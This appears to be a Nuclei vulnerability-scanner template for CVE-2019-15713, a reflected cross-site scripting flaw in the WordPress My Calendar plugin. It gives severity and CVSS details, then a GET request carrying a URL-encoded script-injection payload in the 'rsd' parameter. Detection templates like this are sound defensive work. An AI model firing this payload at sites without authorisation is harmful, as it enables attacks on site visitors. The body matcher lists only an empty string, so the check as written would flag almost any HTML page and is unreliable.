id: CVE-2019-15713 info: name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting author: daffainfo,dhiyaneshDk severity: medium description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site. reference: - https://wpscan.com/vulnerability/9267 - https://wordpress.org/plugins/my-calendar/#developers - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-15713 cwe-id: CWE-79 tags: cve,cve2019,wordpress,xss,wp-plugin requests: - method: GET path: - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - "" part: body - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by mp on 2022/04/21